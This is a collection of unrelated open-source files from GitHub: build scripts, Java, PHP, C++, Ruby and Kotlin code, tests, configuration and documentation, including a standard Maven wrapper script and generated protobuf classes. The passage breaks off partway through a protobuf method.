set ERROR_CODE=0
@REM To isolate internal variables from possible post scripts, we use another setlocal
@setlocal
@REM ==== START VALIDATION ====
if not "%JAVA_HOME%" == "" goto OkJHome
echo.
echo Error: JAVA_HOME not found in your environment. >&2
echo Please set the JAVA_HOME variable in your environment to match the >&2
echo location of your Java installation. >&2
echo.
goto error
:OkJHome
if exist "%JAVA_HOME%\bin\java.exe" goto init
echo.
echo Error: JAVA_HOME is set to an invalid directory. >&2
echo JAVA_HOME = "%JAVA_HOME%" >&2
echo Please set the JAVA_HOME variable in your environment to match the >&2
echo location of your Java installation. >&2
echo.
goto error
@REM ==== END VALIDATION ====
:init
@REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
@REM Fallback to current working directory if not found.
set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
set EXEC_DIR=%CD%
set WDIR=%EXEC_DIR%
:findBaseDir
IF EXIST "%WDIR%"\.mvn goto baseDirFound
cd ..
IF "%WDIR%"=="%CD%" goto baseDirNotFound
set WDIR=%CD%
goto findBaseDir
:baseDirFound
set MAVEN_PROJECTBASEDIR=%WDIR%
cd "%EXEC_DIR%"
goto endDetectBaseDir
:baseDirNotFound
set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
cd "%EXEC_DIR%"
:endDetectBaseDir
IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
@setlocal EnableExtensions EnableDelayedExpansion
for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
:endReadAdditionalConfig
SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.4.2/maven-wrapper-0.4.2.jar"
FOR /F "tokens=1,2 delims==" %%A IN (%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties) DO (
IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
)
@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
@REM This allows using the maven wrapper in projects that prohibit checking in binary data.
if exist %WRAPPER_JAR% (
echo Found %WRAPPER_JAR%
) else (
echo Couldn't find %WRAPPER_JAR%, downloading it ...
echo Downloading from: %DOWNLOAD_URL%
powershell -Command "(New-Object Net.WebClient).DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"
echo Finished downloading %WRAPPER_JAR%
)
@REM End of extension
%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
if ERRORLEVEL 1 goto error
goto end
:error
set ERROR_CODE=1
:end
@endlocal & set ERROR_CODE=%ERROR_CODE%
if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost
@REM check for post script, once with legacy .bat ending and once with .cmd ending
if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat"
if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd"
:skipRcPost
@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
if "%MAVEN_BATCH_PAUSE%" == "on" pause
if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE%
exit /B %ERROR_CODE%
| {
"pile_set_name": "Github"
} |
package com.earth2me.essentials.storage;
import net.ess3.api.IEssentials;
import org.bukkit.Bukkit;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.PrintWriter;
import java.util.logging.Level;
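/**
 * Writes the {@link StorageObject} returned by {@link #getObject()} to a YAML file on an
 * asynchronous task scheduled at construction time. {@link #onFinish()} is always invoked
 * afterwards, even if the write fails.
 */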
public abstract class AbstractDelayedYamlFileWriter implements Runnable {
private final transient File file;
public AbstractDelayedYamlFileWriter(IEssentials ess, File file) {
this.file = file;
ess.runTaskAsynchronously(this);
}
public abstract StorageObject getObject();
@Override
public void run() {
PrintWriter pw = null;
try {
final StorageObject object = getObject();
final File folder = file.getParentFile();
if (!folder.exists()) {
folder.mkdirs();
}
pw = new PrintWriter(file);
new YamlStorageWriter(pw).save(object);
} catch (FileNotFoundException ex) {
Bukkit.getLogger().log(Level.SEVERE, file.toString(), ex);
} finally {
onFinish();
if (pw != null) {
pw.close();
}
}
}
public abstract void onFinish();
}
| {
"pile_set_name": "Github"
} |
export * from "./cosmos-hub-mainnet.js"
| {
"pile_set_name": "Github"
} |
# Define working variables
$octopusURL = "https://youroctourl"
$octopusAPIKey = "API-YOURAPIKEY"
$header = @{ "X-Octopus-ApiKey" = $octopusAPIKey }
$projectName = "MyProject"
$librarySetName = "MyLibrarySet"
try
{
# Get space
$space = (Invoke-RestMethod -Method Get -Uri "$octopusURL/api/spaces/all" -Headers $header) | Where-Object {$_.Name -eq $spaceName}
# Get project
$project = (Invoke-RestMethod -Method Get -Uri "$octopusURL/api/$($space.Id)/projects/all" -Headers $header) | Where-Object {$_.Name -eq $projectName}
# Get library set
$librarySet = (Invoke-RestMethod -Method Get -Uri "$octopusURL/api/$($space.Id)/libraryvariablesets/all" -Headers $header) | Where-Object {$_.Name -eq $librarySetName}
# Add the library set
$project.IncludedLibraryVariableSetIds += $librarySet.Id
# Update the project
Invoke-RestMethod -Method Put -Uri "$octopusURL/api/$($space.Id)/projects/$($project.Id)" -Headers $header -Body ($project | ConvertTo-Json -Depth 10)
}
catch
{
Write-Host $_.Exception.Message
} | {
"pile_set_name": "Github"
} |
// Copyright 2017 Yahoo Holdings. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
package com.yahoo.searchdefinition.processing;
import com.yahoo.document.DataType;
import com.yahoo.document.Field;
import com.yahoo.document.ReferenceDataType;
import com.yahoo.searchdefinition.DocumentGraphValidator;
import com.yahoo.searchdefinition.Search;
import com.yahoo.searchdefinition.SearchBuilder;
import com.yahoo.searchdefinition.document.SDDocumentType;
import com.yahoo.searchdefinition.parser.ParseException;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import static org.hamcrest.Matchers.instanceOf;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertThat;
/**
* @author bjorncs
*/
public class ReferenceFieldTestCase {
@Rule
public final ExpectedException exceptionRule = ExpectedException.none();
@Test
public void reference_fields_are_parsed_from_search_definition() throws ParseException {
SearchBuilder builder = new SearchBuilder();
String campaignSdContent =
"search campaign {\n" +
" document campaign {\n" +
" }\n" +
"}";
String salespersonSdContent =
"search salesperson {\n" +
" document salesperson {\n" +
" }\n" +
"}";
String adSdContent =
"search ad {\n" +
" document ad {\n" +
" field campaign_ref type reference<campaign> { indexing: attribute }\n" +
" field salesperson_ref type reference<salesperson> { indexing: attribute }\n" +
" }\n" +
"}";
builder.importString(campaignSdContent);
builder.importString(salespersonSdContent);
builder.importString(adSdContent);
builder.build();
Search search = builder.getSearch("ad");
assertSearchContainsReferenceField("campaign_ref", "campaign", search.getDocument());
assertSearchContainsReferenceField("salesperson_ref", "salesperson", search.getDocument());
}
@Test
public void cyclic_document_dependencies_are_detected() throws ParseException {
SearchBuilder builder = new SearchBuilder();
String campaignSdContent =
"search campaign {\n" +
" document campaign {\n" +
" field ad_ref type reference<ad> { indexing: attribute }\n" +
" }\n" +
"}";
String adSdContent =
"search ad {\n" +
" document ad {\n" +
" field campaign_ref type reference<campaign> { indexing: attribute }\n" +
" }\n" +
"}";
builder.importString(campaignSdContent);
builder.importString(adSdContent);
exceptionRule.expect(DocumentGraphValidator.DocumentGraphException.class);
exceptionRule.expectMessage("Document dependency cycle detected: campaign->ad->campaign.");
builder.build();
}
private static void assertSearchContainsReferenceField(String expectedFieldname,
String referencedDocType,
SDDocumentType documentType) {
Field field = documentType.getDocumentType().getField(expectedFieldname);
assertNotNull("Field does not exist in document type: " + expectedFieldname, field);
DataType dataType = field.getDataType();
assertThat(dataType, instanceOf(ReferenceDataType.class));
ReferenceDataType refField = (ReferenceDataType) dataType;
assertEquals(referencedDocType, refField.getTargetType().getName());
}
}
| {
"pile_set_name": "Github"
} |
<?php
declare(strict_types=1); // @codeCoverageIgnore
use Evenement\EventEmitterInterface;
use Peridot\Console\Environment;
use Peridot\Reporter\CodeCoverage\AbstractCodeCoverageReporter;
use Peridot\Reporter\CodeCoverageReporters;
use Recoil\Dev\Peridot\Plugin;
use Recoil\ReferenceKernel\ReferenceKernel;
require __DIR__ . '/vendor/autoload.php';
return function (EventEmitterInterface $emitter) {
(new CodeCoverageReporters($emitter))->register();
Plugin::install($emitter, function () {
return ReferenceKernel::create();
});
$emitter->on('peridot.start', function (Environment $environment) {
$environment->getDefinition()->getArgument('path')->setDefault('test/suite');
});
$emitter->on('code-coverage.start', function (AbstractCodeCoverageReporter $reporter) {
$reporter->addDirectoryToWhitelist(__DIR__ . '/src');
});
};
| {
"pile_set_name": "Github"
} |
void test(bool x) {
if (x) {}
// RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:2:7 %s | FileCheck %s
// CHECK: PREFERRED-TYPE: _Bool
while (x) {}
// RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:6:10 %s | FileCheck %s
for (; x;) {}
// RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:9:10 %s | FileCheck %s
// FIXME(ibiryukov): the condition in do-while is parsed as expression, so we
// fail to detect it should be converted to bool.
// do {} while (x);
}
| {
"pile_set_name": "Github"
} |
Alex Chapman
Daniel Ehrenberg
| {
"pile_set_name": "Github"
} |
<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:Controls="clr-namespace:System.Windows.Controls">
<Style TargetType="{x:Type Controls:EditTextBox}">
<Setter Property="Foreground" Value="{DynamicResource {x:Static SystemColors.ControlTextBrushKey}}"/>
<Setter Property="Background" Value="{DynamicResource {x:Static SystemColors.WindowBrushKey}}"/>
<Setter Property="BorderBrush" Value="Black"/>
<Setter Property="BorderThickness" Value="0"/>
<Setter Property="Padding" Value="1"/>
<Setter Property="AllowDrop" Value="true"/>
<Setter Property="FocusVisualStyle" Value="{x:Null}"/>
<Setter Property="VerticalContentAlignment" Value="Center"/>
<Setter Property="Template">
<Setter.Value>
<ControlTemplate TargetType="{x:Type TextBox}">
<Border
Name="Bd"
SnapsToDevicePixels="true"
Background="{TemplateBinding Background}"
BorderBrush="{TemplateBinding BorderBrush}"
BorderThickness="{TemplateBinding BorderThickness}">
<ScrollViewer
Name="PART_ContentHost"
SnapsToDevicePixels="{TemplateBinding SnapsToDevicePixels}"
VerticalAlignment="Top"/>
</Border>
<ControlTemplate.Triggers>
<Trigger Property="IsEnabled" Value="false">
<Setter Property="Background" TargetName="Bd" Value="{DynamicResource {x:Static SystemColors.ControlBrushKey}}"/>
<Setter Property="Foreground" Value="{DynamicResource {x:Static SystemColors.GrayTextBrushKey}}"/>
</Trigger>
</ControlTemplate.Triggers>
</ControlTemplate>
</Setter.Value>
</Setter>
</Style>
</ResourceDictionary> | {
"pile_set_name": "Github"
} |
require 'bundler/setup'
require 'bundler/gem_tasks'
require 'rake/testtask'
require 'yard'
require 'llvm/version'
require 'llvm/config'
YARD::Rake::YardocTask.new do |t|
yardlib = File.join(File.dirname(__FILE__), "yardlib/llvm.rb")
t.options = %W[-e #{yardlib} --no-private]
t.files = Dir['lib/**/*.rb']
end
Rake::TestTask.new do |t|
t.libs = %w(test)
t.test_files = FileList["test/**/*_test.rb"]
end
desc 'Regenerate FFI bindings'
task :generate_ffi do
require 'ffi_gen'
mappings = {
# Core
'core_ffi.rb' => %w(Support.h Core.h),
'core/bitcode_ffi.rb' => %w(BitReader.h BitWriter.h),
# Transformations
'analysis_ffi.rb' => %w(Analysis.h),
'transforms/ipo_ffi.rb' => %w(Transforms/IPO.h),
'transforms/scalar_ffi.rb' => %w(Transforms/Scalar.h),
'transforms/vectorize_ffi.rb' => %w(Transforms/Vectorize.h),
'transforms/builder_ffi.rb' => %w(Transforms/PassManagerBuilder.h),
# Code generation
'target_ffi.rb' => %w(Target.h TargetMachine.h),
'linker_ffi.rb' => %w(Linker.h),
'execution_engine_ffi.rb' => %w(ExecutionEngine.h),
}
mappings.each do |ruby_file, headers|
FFIGen.generate(
module_name: 'LLVM::C',
ffi_lib: ["libLLVM-#{LLVM::LLVM_VERSION}.so.1",
"LLVM-#{LLVM::LLVM_VERSION}"],
headers: headers.map { |header| "llvm-c/#{header}" },
cflags: LLVM::CONFIG::CFLAGS.split(/\s/),
prefixes: %w(LLVM),
output: "lib/llvm/#{ruby_file}"
)
end
end
task :default => [:test]
| {
"pile_set_name": "Github"
} |
package com.shreyaspatil.MaterialNavigationDrawer.example.ui.home
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import android.widget.TextView
import androidx.fragment.app.Fragment
import androidx.lifecycle.Observer
import androidx.lifecycle.ViewModelProviders
import com.shreyaspatil.MaterialNavigationDrawer.example.R
class HomeFragment : Fragment() {
private lateinit var homeViewModel: HomeViewModel
override fun onCreateView(
inflater: LayoutInflater,
container: ViewGroup?,
savedInstanceState: Bundle?
): View? {
homeViewModel =
ViewModelProviders.of(this).get(HomeViewModel::class.java)
val root = inflater.inflate(R.layout.fragment_home, container, false)
val textView: TextView = root.findViewById(R.id.text_home)
homeViewModel.text.observe(this, Observer {
textView.text = it
})
return root
}
} | {
"pile_set_name": "Github"
} |
# This file is used by the build system to adjust CSS and JS output to support the specified browsers below.
# For additional information regarding the format and rule options, please see:
# https://github.com/browserslist/browserslist#queries
# You can see what browsers were selected by your queries by running:
# npx browserslist
> 0.5%
last 2 versions
Firefox ESR
not dead
IE 9-11 | {
"pile_set_name": "Github"
} |
interface I {}
@:cs.using("System")
class Main2 {
public static function main():Void {
trace('ko');
}
}
| {
"pile_set_name": "Github"
} |
#include <unittest/runtime_static_assert.h>
#include <unittest/unittest.h>
#include <thrust/generate.h>
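// dependent_false<T> is always false, but because its value depends on T the
// THRUST_STATIC_ASSERT below only fires when static_assertion's operator() is
// actually instantiated (here, inside thrust::generate).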
template<typename T>
struct dependent_false
{
enum { value = false };
};
template<typename T>
struct static_assertion
{
__host__ __device__
int operator()() const
{
THRUST_STATIC_ASSERT(dependent_false<T>::value);
return 0;
}
};
template<typename V>
void TestStaticAssertAssert()
{
#if THRUST_DEVICE_SYSTEM != THRUST_DEVICE_SYSTEM_OMP && THRUST_HOST_SYSTEM != THRUST_HOST_SYSTEM_OMP
V test(10);
ASSERT_STATIC_ASSERT(thrust::generate(test.begin(), test.end(), static_assertion<int>()));
#endif
}
DECLARE_VECTOR_UNITTEST(TestStaticAssertAssert);
| {
"pile_set_name": "Github"
} |
.. TorchSat documentation master file, created by
sphinx-quickstart on Sat Sep 14 10:56:23 2019.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to TorchSat's documentation!
====================================
TorchSat is an open-source deep learning framework for satellite imagery analysis based on PyTorch_.
This project is still a **work in progress**. If you want to know more about it, please refer to the Roadmap_.
**Highlights**
- Supports multi-channel (> 3 channels, e.g. 8 channels) images and TIFF files as input.
- Convenient data augmentation methods for classification, semantic segmentation and object detection.
- Lots of models for satellite vision tasks, such as ResNet, DenseNet, UNet, PSPNet, SSD, FasterRCNN ...
- Lots of loaders for common satellite datasets.
- Training scripts for common satellite vision tasks.
.. toctree::
:maxdepth: 2
:caption: Contents:
installation.md
core-conception.md
tutorials/image-classification.md
tutorials/semantic-segmentation.md
tutorials/object-detection.md
tutorials/change-detection.md
tutorials/data-augumentation.md
tools.md
api/api.rst
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
.. _Roadmap: https://github.com/sshuair/torchsat/wiki/Roadmap
.. _PyTorch: https://pytorch.org/
| {
"pile_set_name": "Github"
} |
/*
Copyright (C) 2012 Joost-Wim Boekesteijn <[email protected]>
Copyright (C) 2011 Ariya Hidayat <[email protected]>
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*jslint node: true */
/*global document: true, window:true, esprima: true, testReflect: true */
var runTests;
function getContext(esprima, reportCase, reportFailure) {
'use strict';
var Reflect, Pattern;
// Maps Mozilla Reflect object to our Esprima parser.
Reflect = {
parse: function (code) {
var result;
reportCase(code);
try {
result = esprima.parse(code);
} catch (error) {
result = error;
}
return result;
}
};
// This is used by Reflect test suite to match a syntax tree.
Pattern = function (obj) {
var pattern;
// Poor man's deep object cloning.
pattern = JSON.parse(JSON.stringify(obj));
// Special handling for regular expression literal since we need to
// convert it to a string literal, otherwise it will be decoded
// as object "{}" and the regular expression would be lost.
if (obj.type && obj.type === 'Literal') {
if (obj.value instanceof RegExp) {
pattern = {
type: obj.type,
value: obj.value.toString()
};
}
}
// Special handling for branch statement because SpiderMonkey
// prefers to put the 'alternate' property before 'consequent'.
if (obj.type && obj.type === 'IfStatement') {
pattern = {
type: pattern.type,
test: pattern.test,
consequent: pattern.consequent,
alternate: pattern.alternate
};
}
// Special handling for do while statement because SpiderMonkey
// prefers to put the 'test' property before 'body'.
if (obj.type && obj.type === 'DoWhileStatement') {
pattern = {
type: pattern.type,
body: pattern.body,
test: pattern.test
};
}
function adjustRegexLiteralAndRaw(key, value) {
if (key === 'value' && value instanceof RegExp) {
value = value.toString();
} else if (key === 'raw' && typeof value === "string") {
// Ignore Esprima-specific 'raw' property.
return undefined;
}
return value;
}
if (obj.type && (obj.type === 'Program')) {
pattern.assert = function (tree) {
var actual, expected;
actual = JSON.stringify(tree, adjustRegexLiteralAndRaw, 4);
expected = JSON.stringify(obj, null, 4);
if (expected !== actual) {
reportFailure(expected, actual);
}
};
}
return pattern;
};
return {
Reflect: Reflect,
Pattern: Pattern
};
}
if (typeof window !== 'undefined') {
// Run all tests in a browser environment.
runTests = function () {
'use strict';
var total = 0,
failures = 0;
function setText(el, str) {
if (typeof el.innerText === 'string') {
el.innerText = str;
} else {
el.textContent = str;
}
}
function reportCase(code) {
var report, e;
report = document.getElementById('report');
e = document.createElement('pre');
e.setAttribute('class', 'code');
setText(e, code);
report.appendChild(e);
total += 1;
}
function reportFailure(expected, actual) {
var report, e;
failures += 1;
report = document.getElementById('report');
e = document.createElement('p');
setText(e, 'Expected');
report.appendChild(e);
e = document.createElement('pre');
e.setAttribute('class', 'expected');
setText(e, expected);
report.appendChild(e);
e = document.createElement('p');
setText(e, 'Actual');
report.appendChild(e);
e = document.createElement('pre');
e.setAttribute('class', 'actual');
setText(e, actual);
report.appendChild(e);
}
setText(document.getElementById('version'), esprima.version);
window.setTimeout(function () {
var tick, context = getContext(esprima, reportCase, reportFailure);
tick = new Date();
testReflect(context.Reflect, context.Pattern);
tick = (new Date()) - tick;
if (failures > 0) {
document.getElementById('status').className = 'alert-box alert';
setText(document.getElementById('status'), total + ' tests. ' +
'Failures: ' + failures + '. ' + tick + ' ms');
} else {
document.getElementById('status').className = 'alert-box success';
setText(document.getElementById('status'), total + ' tests. ' +
'No failure. ' + tick + ' ms');
}
}, 11);
};
} else {
(function (global) {
'use strict';
var esprima = require('../esprima'),
tick,
total = 0,
failures = [],
header,
current,
context;
function reportCase(code) {
total += 1;
current = code;
}
function reportFailure(expected, actual) {
failures.push({
source: current,
expected: expected.toString(),
actual: actual.toString()
});
}
context = getContext(esprima, reportCase, reportFailure);
tick = new Date();
require('./reflect').testReflect(context.Reflect, context.Pattern);
tick = (new Date()) - tick;
header = total + ' tests. ' + failures.length + ' failures. ' +
tick + ' ms';
if (failures.length) {
console.error(header);
failures.forEach(function (failure) {
console.error(failure.source + ': Expected\n ' +
failure.expected.split('\n').join('\n ') +
'\nto match\n ' + failure.actual);
});
} else {
console.log(header);
}
process.exit(failures.length === 0 ? 0 : 1);
}(this));
}
/* vim: set sw=4 ts=4 et tw=80 : */
| {
"pile_set_name": "Github"
} |
# When the first scenario fails, we want to save the page and launch it in the browser.
# We don't want to open subsequent failures, as that can be HIGHLY annoying when running from the command line.
#
# Also, this https://gist.github.com/398643
# has good info on how to save Assets/CSS so we can see the full version of the page.
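#
# Setting the environment variable launch_on_failure=false disables the auto-launch entirely
# (see the check in the After hook below).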
#
module LaunchOnFirstFailure
class << self
attr_accessor :failed_tests
def failure_occurred
self.failed_tests = 0 unless failed_tests
self.failed_tests += 1
end
def failed_tests?
failed_tests && failed_tests >= 0
end
end
end
After('~@cli') do |scenario|
if scenario.failed? && !LaunchOnFirstFailure.failed_tests? && ENV['launch_on_failure'] != 'false'
LaunchOnFirstFailure.failure_occurred
save_and_open_page
end
end | {
"pile_set_name": "Github"
} |
// Generated by the protocol buffer compiler. DO NOT EDIT!
// source: DependencyTestProto.proto
package io.confluent.kafka.serializers.protobuf.test;
public final class DependencyTestProto {
private DependencyTestProto() {}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistryLite registry) {
}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistry registry) {
registerAllExtensions(
(com.google.protobuf.ExtensionRegistryLite) registry);
}
public interface DependencyMessageOrBuilder extends
// @@protoc_insertion_point(interface_extends:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
com.google.protobuf.MessageOrBuilder {
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return Whether the nestedMessage field is set.
*/
boolean hasNestedMessage();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return The nestedMessage.
*/
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage getNestedMessage();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder getNestedMessageOrBuilder();
/**
* <code>bool is_active = 2;</code>
* @return The isActive.
*/
boolean getIsActive();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return Whether the testMesssage field is set.
*/
boolean hasTestMesssage();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return The testMesssage.
*/
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage getTestMesssage();
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder getTestMesssageOrBuilder();
}
/**
* Protobuf type {@code io.confluent.kafka.serializers.protobuf.test.DependencyMessage}
*/
public static final class DependencyMessage extends
com.google.protobuf.GeneratedMessageV3 implements
// @@protoc_insertion_point(message_implements:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
DependencyMessageOrBuilder {
private static final long serialVersionUID = 0L;
// Use DependencyMessage.newBuilder() to construct.
private DependencyMessage(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private DependencyMessage() {
}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(
UnusedPrivateParameter unused) {
return new DependencyMessage();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
private DependencyMessage(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
case 10: {
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder subBuilder = null;
if (nestedMessage_ != null) {
subBuilder = nestedMessage_.toBuilder();
}
nestedMessage_ = input.readMessage(io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.parser(), extensionRegistry);
if (subBuilder != null) {
subBuilder.mergeFrom(nestedMessage_);
nestedMessage_ = subBuilder.buildPartial();
}
break;
}
case 16: {
isActive_ = input.readBool();
break;
}
case 26: {
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder subBuilder = null;
if (testMesssage_ != null) {
subBuilder = testMesssage_.toBuilder();
}
testMesssage_ = input.readMessage(io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.parser(), extensionRegistry);
if (subBuilder != null) {
subBuilder.mergeFrom(testMesssage_);
testMesssage_ = subBuilder.buildPartial();
}
break;
}
default: {
if (!parseUnknownField(
input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_fieldAccessorTable
.ensureFieldAccessorsInitialized(
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.class, io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.Builder.class);
}
public static final int NESTED_MESSAGE_FIELD_NUMBER = 1;
private io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage nestedMessage_;
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return Whether the nestedMessage field is set.
*/
public boolean hasNestedMessage() {
return nestedMessage_ != null;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return The nestedMessage.
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage getNestedMessage() {
return nestedMessage_ == null ? io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.getDefaultInstance() : nestedMessage_;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder getNestedMessageOrBuilder() {
return getNestedMessage();
}
public static final int IS_ACTIVE_FIELD_NUMBER = 2;
private boolean isActive_;
/**
* <code>bool is_active = 2;</code>
* @return The isActive.
*/
public boolean getIsActive() {
return isActive_;
}
public static final int TEST_MESSSAGE_FIELD_NUMBER = 3;
private io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage testMesssage_;
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return Whether the testMesssage field is set.
*/
public boolean hasTestMesssage() {
return testMesssage_ != null;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return The testMesssage.
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage getTestMesssage() {
return testMesssage_ == null ? io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.getDefaultInstance() : testMesssage_;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder getTestMesssageOrBuilder() {
return getTestMesssage();
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
if (nestedMessage_ != null) {
